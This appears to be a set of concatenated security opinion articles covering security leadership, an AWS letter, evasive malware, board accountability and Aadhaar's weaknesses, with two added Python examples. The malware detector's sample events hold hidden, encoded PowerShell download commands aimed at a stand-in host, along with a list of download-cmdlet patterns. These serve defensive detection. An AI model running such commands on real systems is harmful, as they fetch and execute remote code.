Centering Your Security Strategy on Leadership, Resilience and Fundamentals

Cyber security technology solutions continue to advance, as do cyber-attack methods. Cisco is tracking this phenomenon in malware development by measuring Time To Evolve (TTE) — essentially the time that elapses between distinct changes in evasive file and delivery tactics. Malicious hackers’ inventiveness and sophistication have allowed six malware families to continue creating havoc over an extended period of time. These strategies only partially explain why we see the same vulnerabilities being exploited year after year. If we worry too much about sophisticated zero-day attacks or become distracted by the overblown promises of the latest software package, we continue to neglect the elements that are proven to protect or expose us.

Verizon’s 2017 Data Breach Investigations Report highlighted that, yet again, it’s the fundamentals that will be our undoing — but they could also be our saving grace. The vast majority of breaches (88%) fall into one of nine attack patterns – the same nine patterns Verizon identified three years ago. Phishing is still among the most prevalent attack vectors, and lots of people are still falling for it: the report found one in 14 users had opened a phishing link or attachment, and a quarter of them did it more than once. Two-thirds of malware is installed via malicious attachments; likewise, ransomware and web application attacks frequently use phishing emails, texts, and calls to initiate access. Finally, the password plague continues to sicken security programs – 81% of hacking breaches used stolen or weak passwords to gain a foothold.

The bad news is that we don’t seem to be learning from our mistakes as quickly as we should. The good news is, raising security awareness across the enterprise doesn’t require capital investments or complex upgrades. It requires diligence, leadership, and contextual threat intelligence — and it starts in the C-suite.

Reducing the Risk of Attack

Today, risk management largely focuses on achieving security through the management and control of known risks. The rapid evolution of opportunities and risks in cyberspace is outpacing this approach, and it no longer provides the required protection. Cyber resilience requires recognition that organizations must prepare now to deal with severe impacts from cyber threats that are impossible to predict. Organizations must extend risk management to include risk resilience in order to manage, respond to and mitigate any negative impacts of cyberspace activity.

Cyber resilience also requires that organizations have the agility to prevent, detect and respond quickly and effectively, not just to incidents, but also to the consequences of the incidents. This means assembling multidisciplinary teams from businesses and functions across the organization, and beyond, to develop and test plans for when breaches and attacks occur. This team should be able to respond quickly to an incident by communicating with all parts of the organization, individuals who might have been compromised, shareholders, regulators and other stakeholders who might be affected.

Cyber resilience is all about ensuring the sustainability and success of an organization, even when it has been subjected to an almost inescapable attack. By adopting a realistic, broad-based, collaborative approach to cyber security and resilience, government departments, regulators, senior business managers and information security professionals will be better able to understand the true nature of cyber threats and respond quickly and appropriately.

Focus on the Fundamentals

Business leaders recognize the enormous benefits of cyberspace and how the Internet greatly increases innovation, collaboration, productivity, competitiveness and engagement with customers. Unfortunately, they have difficulty assessing the risks versus the rewards. One thing that organizations must do is ensure they have standard security measures in place. This means going well beyond implementing the latest security tools.

Cisco’s 2017 survey of security capabilities found that while CSOs and SecOps managers are confident they have the best technologies available, they are much less certain that, in the face of skills and budget shortages, they are making the best use of these tools. Such fundamental shortcomings are a good place to start if you’re looking to fortify your existing defenses.

Every type and size of organization is vulnerable to cyber-attacks. To control risk and damage, each organization has to develop and maintain a thorough understanding of its particular weak points, targeted mission-critical information assets and industry-specific threat vectors. Executives who leverage threat intelligence, maintain strong contextual awareness, and stay committed to managing insider threats help their organizations develop a deeper culture of defense, injecting security throughout the enterprise.

Companies that prioritize well-equipped security programs and widespread security awareness are more prepared to grow, innovate and compete. In order to consistently make better decisions about how to align business and security objectives to manage risk, protect brand reputation, and respond effectively to incidents, boards and senior executives have to remain steadfastly engaged.

About the author: Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include strategy, information technology, cyber security and the emerging security threat landscape across both the corporate and personal environments. Previously, he was senior vice president at Gartner.

Copyright 2010 Respective Author at Infosec Island

An Open Letter to AWS CEO Andy Jassy on Cloud Security Innovation

Dear Andy,

Congratulations to you and the entire Amazon team on your latest quarterly results. Your team’s contribution continues to be impressive. I was particularly excited to hear that AWS’ expanding partner base continues to be an important driver of your growth.

From where I sit, your commitment and focus on fueling the ecosystem has never wavered. It once took a few hours to walk the partner expo at re:Invent and the AWS Summits; now it takes a day or more. So, every time I read a media report that says you have partners in the crosshairs, I ask myself the same question: Did I miss the memo advising all small, innovative startups that it’s time to close their doors because you’re investing in technology and companies to make AWS better and more secure?

The focus of late has been on cloud security and rightfully so. Organizations of all sizes are migrating to the cloud to take advantage of cost savings, efficiency gains, and the flexibility to scale. Of course, fraud, hacking and malware are proliferating just as quickly as the good kind of cloud technology, so security is becoming the top priority for organizations that want to stay protected while taking full advantage of the benefits of running in the cloud.

I will always maintain my steadfast perspective that collaboration of innovators, regardless of size, is essential in helping businesses of all sizes and cyber sophistication to reduce their cyber risk.

It is true that cybersecurity startups do not have as loud a voice as AWS and other large cloud providers. Their greatest asset is the ability to innovate, attract passionate and high-intellect employees looking to do meaningful and impactful work without the bureaucracy, traditional process and politics of the larger, more established companies.

While the story of AWS being a threat to companies like ours may get a lot of clicks and shares (I can attest to this first-hand), it distracts the community from the bigger story about the magnitude of the cybersecurity challenge. The reality of the cybersecurity market is that the sophistication of the attacks and the implications of lengthy times to detect, understand and remediate put businesses of all sizes at risk.

The role of cybersecurity providers is to provide businesses with security context as a means of reducing the “mean time to know” and accelerate actions to remediation.

The bigger story is about how continued investments, organic or inorganic, strengthen security context for businesses of all sizes. The more security signals, the more security context; the more context, the more accelerated “mean time to know”; the faster “mean time to know,” the faster the actions to remediate security risk.

The objective of every startup should be to provide world-class solutions that ingest security indicators that Amazon and numerous partners across the AWS ecosystem make available. This provides correlated security context and reduces business resource requirement to quickly address the growing cyber threats businesses face every day.

We are not threatened by the actions of AWS but instead are encouraged by it. We welcome the additional security indicators you are making available through your tools and services. I strongly feel that “us vs. them” is not a vendor vs. vendor discussion. Rather, “us vs. them” is the collaboration of innovative cyber companies of all sizes “versus” those that are motivated by widespread global economic, public safety and national security disruption.

The collaboration of innovative cyber security companies is a win-win for all. We are not willing to close our doors at the “threat” of larger companies investing in the cyber market, but instead, we use it as fuel to further our passion and conviction for our defined mission.

This is what is in the best interest of our mutual customers. I encourage you to maintain your commitment to the ecosystem and for my fellow partners to work together to help customers defend and protect themselves from the increased assault on the data companies are moving to the cloud.

Best regards,

Brian Ahern

CEO & Chairman, Threat Stack

Beat Them at Their Own Game: Understanding and Neutralizing Evasive Malware Tactics in the Face of Rising Attacks

Chasing malware developers through their cyber rabbit holes might be a fun challenge for security researchers, but for the rest of us, the effectiveness of modern attack methods is frustrating and alarming. Incidents that involved evasive malware, and in particular fileless techniques for bypassing endpoint security measures, were prevalent in 2017. They are set to be even more damaging, costly, and exasperating in 2018.

It’s an old story by now — the more security pros learn about protecting their organizations against malware, the more wily and sophisticated the adversaries get. The adversaries will always have the incentive and the ability to bypass detection-based technologies. In order to protect their nefarious creations (and their investments), attackers will try everything they can in order to evade detection.

The ability of attackers to avoid being detected isn’t as simple as it sounds when an entire world’s worth of security experts, artificial intelligence systems, and endpoint protection software vendors are focused on doing just that. And the stakes are getting higher. Experts predict that this year, state-sponsored hackers, hacktivists, and crime syndicates will leverage and target major events like the Olympics and U.S. midterm elections. Even more alarming, it is expected that ransomware attacks on hospitals and IoT devices will turn deadly, as attackers extort money and power by hijacking control of pacemakers and other critical equipment.

Malware developers use a number of techniques to ensure that their malicious code runs even on endpoints that use a variety of products dedicated to identifying, detecting, and eradicating malware. These techniques are well documented, can be understood by day-to-day attackers, and are increasingly offered as an easy-to-deploy service by cybercrime syndicates. Common evasive techniques include:

Refusing to Infect in “Hostile” Environments

Malware developers want to avoid having their code fingerprinted, which subsequently makes their malware known to antivirus solutions (and therefore readily blocked). Such malicious software is constructed to avoid virtualization environments, sandboxes, and antivirus solutions by shutting itself down and leaving no trace through artifacts or executed processes.

Using Memory Injection

Malicious code injects itself into trusted processes on the system, abusing the legitimate capabilities of the operating system or software to avoid solutions that look for new and unwanted files and processes. Malicious code is concealed in a file using a packer or other technique, so it arrives looking normal, injects itself into other legitimate applications, and gains a foothold. Such techniques are used in the fileless attacks mentioned above. One of these schemes recently made headlines by targeting organizations providing critical support to the Olympics. The attack combined a phishing email, a weaponized Word file, and a hidden PowerShell script. Using native PowerShell functions to evade pattern-matching solutions and other defenses, attackers are able to establish a link to a remote server, possibly with the intention of downloading more malware.
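As an added example (not part of the original article, and not any vendor's product logic), the following Python flags the Word-to-PowerShell chain described above in constructed process-creation events: an Office parent spawning a script host, an encoded or hidden PowerShell command line, and a remote-download cmdlet found after decoding. The event field names, process lists and weights are assumptions chosen for illustration.

```python
"""Detect Office-spawned script hosts in (constructed) process-creation events."""
import base64
import re

# Assumed record layout: parent image, child image and full command line.
# These sample events are constructed for this example, not real telemetry.
_ENCODED_PAYLOAD = base64.b64encode(
    "Invoke-WebRequest -Uri http://example.invalid/stage2".encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS = [
    {"pid": 4312,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -Enc " + _ENCODED_PAYLOAD},
    {"pid": 4313,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"pid": 4314,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c echo hello"},
    {"pid": 4315,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -w hidden -nop -c "Invoke-WebRequest http://example.invalid/a"'},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
WEIGHTS = {  # illustrative weights, not a calibrated model
    "office-parent-spawned-script-host": 3,
    "encoded-command": 2,
    "hidden-window": 1,
    "no-profile-or-noninteractive": 1,
    "remote-download-in-command": 3,
}


def _is_param(token, name):
    """PowerShell accepts any unambiguous prefix of a parameter (-enc, -ec, -e ...)."""
    if not token.startswith(("-", "/")):
        return False
    stem = token.lstrip("-/").lower()
    return bool(stem) and name.startswith(stem)


def decode_encoded_command(command_line):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/undecodable."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_param(tok, "encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def severity_label(score):
    return "high" if score >= 6 else "medium" if score >= 3 else "low"


def analyze_event(event):
    """Score one process-creation event and list the reasons it looks evasive."""
    parent, child = _basename(event["parent_image"]), _basename(event["image"])
    cmdline = event["command_line"]
    tokens = cmdline.split()
    reasons = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append("office-parent-spawned-script-host")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded-command")
    if any(_is_param(t, "windowstyle") and "hidden".startswith(tokens[i + 1].lower())
           for i, t in enumerate(tokens[:-1])):
        reasons.append("hidden-window")
    if any(_is_param(t, "noprofile") or _is_param(t, "noninteractive") for t in tokens):
        reasons.append("no-profile-or-noninteractive")
    # Match download cmdlets in the visible command line and in the decoded payload.
    if DOWNLOAD_RE.search(cmdline + " " + (decoded or "")):
        reasons.append("remote-download-in-command")
    score = sum(WEIGHTS[r] for r in reasons)
    return {"pid": event["pid"], "parent": parent, "child": child, "reasons": reasons,
            "score": score, "severity": severity_label(score), "decoded_command": decoded}


def scan(events):
    """Return analyses for every event that triggered at least one reason."""
    return [a for a in (analyze_event(e) for e in events) if a["reasons"]]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["pid"], alert["severity"], alert["reasons"])
```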

Using Document Files

Malware hides in documents (Word, Excel, PDF) using macros, website links, and exploits to bypass defenses. This type of attack can also be complex to detect. Consider, for example, a PDF file that contains an embedded Word document, which includes a macro that downloads and executes additional malicious code on an endpoint. These evasive tactics make it difficult for both traditional and next-gen AV solutions to separate malicious from non-malicious files.

Evasion techniques allow adversaries to get past even modern endpoint security solutions, regardless of whether they’re based on signatures, behavioral monitoring, file reputation, machine learning, or heuristics. Besides being complex and creatively manipulative, there are several reasons why these evasion techniques work, even against modern AV defenses:

  • All forms of AV are based, at least to some extent, on historical information (signatures, behavior patterns, etc.), even if this information is used to develop a machine learning model. If there are no fingerprints or historical threat artifacts to “convict” for detection, the malware is invisible to these solutions.
  • Malware gets regular updates. The adversaries are motivated to keep their attack tools fresh and unknown.
  • Malware is often purpose-built to avoid detection and tested against current implementations of defense solutions. Adversaries ensure that their attacks will be invisible to traditional as well as next-gen AV solutions by devising software that differs from expected patterns and adding combinations of obfuscation tactics.

Evolving Your Endpoint Protection Strategy

Baseline AV products, be they traditional or next gen, play an important role in safeguarding the endpoint, but attackers will always find ways around their detection-based approaches. That’s why such technologies aren’t sufficient by themselves to secure laptops, workstations, servers or other devices in the modern enterprise. To block attacks, security teams need to better understand the mechanics of evasion and the limits of signature, pattern, and behavior-based security solutions.

Mind the gap between your security tools’ ability to detect and block malicious code and the hackers’ ability to evade detection — you can be sure they are well aware of it. Augment baseline AV with anti-evasion solutions designed to stop this kind of malware by blocking its attempts to bypass detection. In other words, focus on breaking or otherwise negating the evasive techniques themselves, rather than solely detecting the malicious software. By “attacking” attempts to evade your security solutions, you will force the adversaries to pick their poison: implement evasion tactics and be stopped because of them, or don’t evade and be stopped by your baseline security controls.

If there is any hope of disarming modern and well-equipped attackers, we have to beat them at their game. Increasingly, that means outmatching them in a battle of wits by devising creative dodges, artful illusions, and cunning counter maneuvers.

About the author: Eddy Bobritsky is Co-Founder and CEO at Minerva Labs, a leading provider of anti-evasion technology for enterprise endpoints.

Increasing Board Accountability and Expertise Is Critical to Security and Risk Management

2017 saw huge numbers of people affected by breaches – 145 million consumer records in the Equifax breach, and 200 million voter records in the breach of Deep Root Analytics, a firm contracted by the Republican National Committee – as well as reprehensible corporate behavior (Uber’s breach cover-up), state-sponsored attacks (Russia and North Korea have been busy), and legislative response (by states, New York’s DFS, Congressional hearings, Senate proposals, and more). Harder to quantify, but certainly a major concern, is the erosion of public trust.

Given all the attention (and the apparent lack of progress), the year ahead is certain to bring further backlash from frustrated customers, shareholders, partners, and government agencies. How do Directors prepare for this increasing accountability? Tara Swaminatha, renowned legal expert specializing in cyber security liability and risk, recently outlined developments to watch in 2018, including the push to increase cyber security expertise on corporate boards.

The Board of Directors (BoD) is ultimately responsible for the future of their company. Shareholders expect that the companies they have invested in will follow through on specific, well-informed plans to mitigate risk in every form. As we’ve seen in cases like Target, Equifax, and Uber, the first move in response to scandal and public pressure is often the departure (voluntary or otherwise) of the CEO.

Boards Must Ensure Security Efforts Align with Risk Management

Innovations in technology, online services, and cybercrime exploits create disruptive ripple effects, creating new risks for organizations and consumers. Security and risk management programs have to be resilient enough to adapt to constant change. Boards and executives are uniquely positioned to ensure that security initiatives align with business strategy and take an enterprise-wide view of risk and opportunity.

No matter what technical systems, advanced controls, or frontline security experts a company has in place, no one can say they have zero risk of a security breach. The BoD needs to focus on asking, and answering, tough questions to ensure risks are understood and kept at acceptable levels. They must play out the scenarios — what would the aftermath of a breach look like in your organization? Would investigators find evidence of negligence, as in the Target Stores breach, or glaringly insufficient standards of care? In the final analysis, answers to these questions will determine levels of liability. BoDs have to understand this.

The questions that frame this responsibility at a high level are these:

  1. Does my company perform reviews on a regular basis for vulnerabilities that could present risk to us or our customers?
  2. Has my company developed an Acceptable Risk Profile, and a methodology for prioritizing risks?
  3. Does my company have a plan to address these risks, and are we executing against that plan?

Board level reporting is key — BoDs need current, clear information about the effectiveness of their security programs, reported on a consistent basis. Specific examples of useful information for Board level decisions include:

  • Trend data for measuring effectiveness of security investments;
  • Year over year external security assessment test results;
  • Employee security awareness training completion statistics;
  • Results from incident response tabletop exercises; and
  • Third-party risk reports.

Board Education and Risk Awareness

The BoD should approve an Acceptable Risk Profile that can help shape risk reduction programs and reporting. Boards should also review annual risk assessments and evaluate how resources are being allocated to address the findings. This assessment must include vendor/partner risks, a key area of focus for regulation and guidance in coming years. The BoD should constantly ask those responsible to demonstrate that the information security program is aligned to the risk profile of the company and that incident response plans are in place to address the breach and attack scenarios that are most likely to occur, and most likely to cause critical damage.

In short, the Board (or appointed committee) should maintain direct visibility into cyber security posture and improvement efforts. Supporting documentation for the FFIEC’s Cyber Security Assessment Tool contains related recommendations for Boards and CEOs. While this is a tool geared toward financial institutions, the guidance is broadly applicable. It’s important for Directors and executives to familiarize themselves with national standards like the NIST Cybersecurity Framework as well as risk management guidance specific to their industry.

Organizations are increasingly seeking to recruit board members with cyber security expertise. Boards also engage outside experts to support and inform their decision-making. To that end, the BoD must learn how to make the best use of external consultants and identify trusted sources of timely cyber security related information, while at the same time avoiding the internal politics inherent in most organizations. Annual reports geared toward non-technical professionals will help BoDs stay up to date on threat environment trends and actual breach data (e.g., the Verizon Data Breach Investigations Report, Ponemon Institute, and other IT analyst firms).

Proactive Oversight, Continuous Improvement

To stay on top of security and build resilience into your organization, it’s important to put mechanisms in place for ongoing improvement. The technology used to develop both threats and countermeasures is on a very steep growth curve. Directors will find it useful to focus on the following as they plan ahead in 2018 and beyond: organizational structure; Acceptable Risk Profile and routine risk management reviews; internal and external resources for staying informed; and regular reporting that establishes metrics for baseline performance, improvement, and measurable results.

When it comes to cyber and information security, Directors cannot afford to be bystanders. Regulators, law enforcement, legislators, clients, and consumers are watching closely. Blaming cyber criminals, IT teams, and third parties won’t keep Boards and executives out of hot water. Shrewd, visionary leadership is required to build an integrated risk management and security program. Directors who combine mature cyber security awareness with deep industry experience have an increasingly important role to play in protecting their organization and positioning it for sustained success and growth.

About the author: Greg Reber is the Founder and CEO of AsTech, a leading information security consulting firm. Reber was among the first to recognize and address the risks presented by consumer-facing applications, and built AsTech’s reputation over 20 years as a leader in risk management.

Can India’s Biometric Identity Program Aadhaar Be Fixed?

The Supreme Court of India has commenced final hearings in the long-standing challenge to India’s massive biometric identity apparatus, Aadhaar. Following last August’s ruling in the Puttaswamy case rejecting the Attorney General’s contention that privacy was not a fundamental right, a five-judge bench is now weighing in on the privacy concerns raised by the unsanctioned use of Aadhaar.

The stakes in the Aadhaar case are huge, given the central government’s ambitions to export the underlying technology to other countries. Russia, Morocco, Algeria, Tunisia, Malaysia, the Philippines, and Thailand have expressed interest in implementing a biometric identification system inspired by Aadhaar. The Sri Lankan government has already made plans to introduce a biometric digital identity for citizens to access services, despite stiff opposition to the proposal, and similar plans are under consideration in Pakistan, Nepal and Singapore. The outcome of this hearing will impact the acceptance and adoption of biometric identity across the world.

At home in India, the need for biometric identity is staked on claims that it will improve government savings through efficient, targeted delivery of welfare. But in the years since its implementation, there is little evidence to back the government’s savings claims. A widely quoted World Bank estimate of $11 billion in annual savings (or potential savings) due to Aadhaar has been challenged by economists.

The architects of Aadhaar also invoke inclusion to justify the need for creating a centralized identity scheme. Yet, contrary to government claims, there is growing evidence of denial of services for lack of an Aadhaar card, authentication failures that have led to death, starvation, denial of medical services and hospitalization, and denial of public utilities such as pensions, rations, and cooking gas. During last week’s hearings, Aadhaar’s governing institution, the Unique Identity Authority of India (UIDAI), was forced to clarify that access to entitlements would be maintained until an adequate mechanism for authentication of identity was in place, issuing a statement that “no essential service or benefit should be denied to a genuine beneficiary for the want of Aadhaar.”

Centralized Decision-Making Compromises Aadhaar’s Security

The UIDAI was established in 2009 by executive action as the sole decision-making authority for the allocation of resources and contracting institutional arrangements for Aadhaar numbers. With no external or parliamentary oversight over its decision-making, UIDAI engaged in an opaque process of private contracting with foreign biometric service providers to provide technical support for the scheme. The government later passed the Aadhaar Act in 2016 to legitimize UIDAI’s powers, but used a special maneuver that enabled it to bypass the House of Parliament where the government lacked a majority, and prevented its examination by the Parliamentary Standing Committee. The manner in which the Aadhaar Act was passed further weakens the democratic legitimacy of the Aadhaar scheme as a whole.

The lack of accountability emanating from UIDAI’s centralized decision-making is evident in the rushed proof-of-concept trial of the project. Security researchers have noted that the trial sampled data from just 20,000 people and nothing in the UIDAI’s report confirms that each electronic identity on the Central ID Repository (CIDR) is unique or that de-duplication could ever be achieved. As mounting evidence confirms, the decision to create the CIDR was based on an assumption that biometrics cannot be faked, and that even if they were, it would be caught during de-duplication.

It emerged during the Aadhaar hearings that UIDAI has neither access to, nor control of the source code of the software used for Aadhaar CIDR. This means that to date there has been no independent audit of the software that could identify data-mining backdoors or security flaws. The Indian public has also become concerned about the practices of the foreign companies embedded in the Aadhaar system. One of three contractors to UIDAI who were provided full access to classified biometric data stored in the Aadhaar database and permitted to “collect, use, transfer, store and process the data” was US-based L-1 Identity Solutions. The company has since been acquired by a French company, Safran Technologies, which has been accused of hiding the provenance of code bought from a Russian firm to boost software performance of US law enforcement computers. The company is also facing a whistleblower lawsuit alleging it fraudulently took more than $1 billion from US law enforcement agencies.

Compromised Enrollment Scheme

The UIDAI also outsourced the responsibility for enrolling Indians in the Aadhaar system. State government bodies and large private organizations were selected to act as registrars, who, in turn, appointed enrollment agencies, including private contractors, to set up and operate mobile, temporary or permanent enrollment centers. UIDAI created an incentive-based model for successful enrollment, whereby registrars would earn Rs 40-50 (about 75c) for every successful enrollment. Since compensation was tied to successful enrollment, the scheme created the incentive for operators to maximize their earning potential.

By delegating the collection of citizens’ biometrics to private contractors, UIDAI created the scope for the enrollment procedure to be compromised. Hacks to work around the software and hardware soon emerged, and have been employed in scams using cloned fingerprints to create fake enrollments. Corruption, bribery, and the creation of Aadhaar numbers with unverified, absent or false documents have also marred the rollout of the scheme. In 2016, on being detained and questioned, a Pakistani spy produced an Aadhaar card bearing his alias and fake address as proof of identity. The Aadhaar card had been obtained through the enrollment procedure by providing fake identification information.

An India Today investigation has revealed that the misuse of Aadhaar data is widespread, with agents willing to part with demographic records collected from Aadhaar applicants for Rs 2-5 (less than a cent). Another report from 2015 suggests that the enrollment client allows operators to use their fingerprints and Aadhaar number to access, update and print demographic details of people without their consent or biometric authentication.

More recently, an investigation by The Tribune exposed that complete access to the UIDAI database was available for Rs 500 (about $8). The reporter paid to gain access to the data including name, address, postal code, photo, phone number and email collected by UIDAI. For an additional Rs 300, the service provided access to software which allowed the printing of the Aadhaar card after entering the Aadhaar number of any individual. A young Bangalore-based engineer has been accused of developing an Android app “Aadhaar e-KYC”, downloaded over 50,000 times since its launch in January 2017. The software claimed to be able to access Aadhaar information without authorization.

In light of the unreliability of information in the Aadhaar database and systemic failure of the enrollment process, the biometric data collected before the enactment of the Aadhaar Act is an important issue before the Supreme Court. The petitioners have sought the destruction of all biometrics and personal information captured between 2009-2016 on the grounds that it was collected without informed consent and may have been compromised.

Authentication Failures

The original plans for authentication of a person holding an Aadhaar number under Section 2(c) of the Aadhaar Act, 2016 were meant to involve returning a “Yes” if the person’s biometric and demographic data matched those captured during the enrollment process, and “No” if they did not. But somewhere along the way, this policy changed, and in 2016, the UIDAI introduced a new mode of authentication, whereby submitting biometric information against an Aadhaar number would result in that person’s demographic information being returned.

This has created a range of public and private institutions using Aadhaar-based authentication for the provision of services. However, authentication failures due to incorrectly captured fingerprints, or a change in biometric details because of old age or wear and tear, are increasingly common. The ability to do electronic authentication is also limited in India and therefore, printed copies of the Aadhaar number and demographic details are accepted as identification.

There are two main problems with this. First, a printed Aadhaar copy is just a piece of paper that can easily be faked, so the use and acceptance of physical copies creates an avenue for fraud. UIDAI could limit the use of physical copies, but doing so would deprive beneficiaries of services whenever authentication fails. Second, Aadhaar numbers are supposed to be secret, and the use of physical copies encourages the number to be revealed and used publicly. For UIDAI, whose aim is speedy enrollment and continued provision of services despite authentication failures, there is no incentive to stop the use of printed Aadhaar numbers.

Data security has also been weakened because institutions using Aadhaar for authentication have not met the standards for processing and storing data. Last year, UIDAI had to get more than 200 Central and State government departments, including educational institutions, to remove lists of Aadhaar beneficiaries, complete with names, addresses and Aadhaar numbers, that had been uploaded to their public websites.

Securing Aadhaar

Can Aadhaar be secured? Not without significant institutional reforms. Aadhaar has no independent threat-analysis agency: securing the biometric data that has been collected falls under the purview of UIDAI itself. The agency has no Chief Information Officer (CIO) and no defined standard operating procedures for data leaks and security breaches. Demographic information linked to an Aadhaar number, made available to private parties during authentication, is already being collected and stored externally by those parties, and UIDAI has no legal power or regulatory mechanism to prevent this. These parallel databases mean that biometric and demographic information is increasingly scattered across government departments and private companies, many of which have little understanding of, or incentive to ensure, data security.
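The two authentication modes described under Authentication Failures, and the parallel databases the second one enables, can be made concrete in a few lines. The following is an added Python example, not UIDAI code: the enrollment records are constructed and fictitious, and the biometric match is stood in for by an exact hash comparison so that it runs offline (real biometric matching is a fuzzy template comparison). It runs the same transactions through a Yes/No authority and a demographic-returning authority and shows what each relying party is left holding.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class EnrollmentRecord:
    template_hash: bytes  # stand-in for a stored biometric template
    name: str
    address: str
    phone: str


def template_hash(raw_biometric: bytes) -> bytes:
    # Assumption for offline running: real biometric matching is a fuzzy
    # template comparison, not an exact hash match.
    return hashlib.sha256(raw_biometric).digest()


# Constructed enrollment database: fictitious numbers and people, not Aadhaar data.
CENTRAL_DB = {
    "1111 2222 3333": EnrollmentRecord(template_hash(b"fingerprint-A"),
                                       "Asha K", "12 Lake Rd, Bengaluru", "+91 90000 00001"),
    "4444 5555 6666": EnrollmentRecord(template_hash(b"fingerprint-B"),
                                       "Ravi M", "7 Hill St, Pune", "+91 90000 00002"),
}


def authenticate_yes_no(number: str, raw_biometric: bytes) -> bool:
    """Original design: the authority discloses a single bit.

    An unenrolled number and a non-matching biometric produce the same answer
    on the same code path, so a relying party cannot use the call to probe
    which numbers exist."""
    rec = CENTRAL_DB.get(number)
    stored = rec.template_hash if rec is not None else bytes(32)
    matched = hmac.compare_digest(stored, template_hash(raw_biometric))
    return rec is not None and matched


def authenticate_ekyc(number: str, raw_biometric: bytes) -> Optional[dict]:
    """2016 mode: a successful match returns the demographic record itself."""
    if not authenticate_yes_no(number, raw_biometric):
        return None
    rec = CENTRAL_DB[number]
    return {"name": rec.name, "address": rec.address, "phone": rec.phone}


class RelyingParty:
    """A service provider (bank, telecom, ration shop). It keeps whatever the
    authority returns; nothing in the protocol prevents that."""

    def __init__(self, mode: str):
        self.mode = mode
        self.retained = {}

    def onboard(self, number: str, raw_biometric: bytes) -> bool:
        if self.mode == "yes_no":
            ok = authenticate_yes_no(number, raw_biometric)
            if ok:
                self.retained[number] = {"verified": True}  # all it learned
            return ok
        record = authenticate_ekyc(number, raw_biometric)
        if record is not None:
            self.retained[number] = record  # a parallel copy of central data
        return record is not None


def demo():
    """Run identical transactions through both modes; return the per-call
    outcomes and what each relying party holds afterwards."""
    transactions = [
        ("1111 2222 3333", b"fingerprint-A"),  # genuine holder
        ("4444 5555 6666", b"fingerprint-B"),  # genuine holder
        ("4444 5555 6666", b"fingerprint-A"),  # wrong finger: rejected
        ("7777 8888 9999", b"fingerprint-A"),  # unenrolled number: rejected
    ]
    minimal, ekyc = RelyingParty("yes_no"), RelyingParty("ekyc")
    outcomes = [(minimal.onboard(n, b), ekyc.onboard(n, b)) for n, b in transactions]
    return outcomes, minimal.retained, ekyc.retained


if __name__ == "__main__":
    outcomes, minimal_db, ekyc_db = demo()
    print("outcomes (yes/no, ekyc):", outcomes)
    print("yes/no relying party holds:", minimal_db)
    print("ekyc relying party holds:", ekyc_db)
```

Both relying parties get identical accept/reject decisions, so the service is provided equally well in either mode; the difference is entirely in what leaks. After two successful onboardings the Yes/No relying party holds nothing but two verified flags, while the demographic-returning relying party holds full copies of both records and is free to keep, sell or lose them. Data minimization at the authority is the only control that survives once the data has left it.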

The second-order tasks of oversight and regulatory enforcement serve a critical function in creating accountability. Although UIDAI has issued legally enforceable rules, there is no monitoring or enforcement agency, within UIDAI or outside it, to check whether these rules are being followed. For example, an audit of enrollment centers revealed that UIDAI had no way of knowing whether operators were retaining biometrics, or for how long.

UIDAI has also neither adopted nor encouraged the reporting of software vulnerabilities or the testing of enrollment hardware. Vulnerability reporting provides learning opportunities and improves coordination; security researchers can fulfill the critical task of helping institutions identify failures, allowing incremental improvements to the system. But far from encouraging such research, UIDAI has filed FIRs against researchers and reporters who uncovered flaws in the Aadhaar ecosystem.

As controversy over its ability to keep its data secure has grown, the agency has stuck to its aggressive stance, vehemently denying any suggestion of vulnerabilities in the Aadhaar apparatus. This attitude is perplexing given the number of data breaches and procedural gaps being uncovered every day. UIDAI is so confident of its security that it filed an affidavit before the Supreme Court in the Aadhaar case claiming that the data cannot be hacked or breached. UIDAI’s defiance of its own patchy record hardly inspires confidence.

The Way Forward 

The current Aadhaar regime is structured to radically centralize the implementation of Indian government and private digital authentication systems. But a credible national identity system cannot be created by an opaque, unaccountable centralized agency that chooses not to follow democratic procedures when making its rules. It would have made more sense to confine UIDAI’s role to maintaining the legal structure that secures individuals’ rights over their data, enforces contracts, ensures liability for data breaches and performs dispute resolution. UIDAI’s jurisdiction would then be limited to tasks where competition cannot be the organizing principle.

The present scheme has created a market of institutions that use Aadhaar to authenticate identity in the provision of services, with varying degrees of transparency and privacy. The central control of the scheme is too rigid in some ways: the bureaucratic structure of Aadhaar does not adapt to security threats, nor does it allow vendors or private companies to improve their data protection practices. Yet in other ways it is not strong enough, given the security lapses it has enabled by giving multiple parties free access to the Aadhaar database.

